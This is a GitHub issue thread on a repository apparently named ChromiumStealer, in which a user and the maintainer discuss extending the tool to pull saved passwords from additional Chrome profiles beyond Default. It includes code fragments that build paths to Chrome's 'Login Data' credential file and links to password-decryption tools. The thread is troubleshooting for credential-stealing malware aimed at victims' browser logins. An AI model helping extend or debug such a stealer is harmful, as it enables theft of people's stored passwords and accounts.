### ISSUE TITLE
Other profile data

### ISSUE THREAD

**Issue by spices941** [BasedBased/ChromiumStealer#2]
Does it gets data from a different profile, say profile 1 or profile 2? or just from the default from browser?

If not, any idea what could I change to target profile 1?

**Comment by ksdodk** [comment]
which profiles?

**Comment by spices941** [comment]
AppData\Local\Google\Chrome\User Data\Profile 1


I tried changing the code a bit into 

`LoginData = path + "\\User Data\\Profile 1\\Login Data"` 

and I partially get the logins, but just a few lines return and not a full list

**Comment by spices941** [comment]
I found this, if it helps for reference

[#L28](https://github.com/AlessandroZ/LaZagne/blob/2a7e0fe3e1d578017b04bbd112a2c5a5e3aa4632/Windows/lazagne/softwares/browsers/chromium_based.py#L28)
[#L74](https://github.com/ohyicong/decrypt-chrome-passwords/blob/110acade4d2a45d22628029a3010f56159266872/decrypt_chrome_password.py#L74)

**Comment by ksdodk** [comment]
how do you create a profile in chrome? i don't use chromium

i mean, how do these profile folders get created?

**Comment by spices941** [comment]
https://support.google.com/chrome/answer/2364824

And they get created in the same AppData folder, just in a separate directory 

AppData\Local\Google\Chrome\User Data\Profile 1

Instead of

AppData\Local\Google\Chrome\User Data\Default

**Comment by ksdodk** [comment]
added, try it and tell me if it works because i am not sure

**Comment by spices941** [comment]
Still not able to retrieve data from multiple profiles

I get `ChromeP Local State file missing` and just Default login data return

```
def Login_Data(path):
    if "Profile" in path:
        return f"{path}\\Login Data"
    else:
        return f"{path}\\User Data\\PROFILE 2\\Login Data"
```

I tested like that and it does work, just for one profile
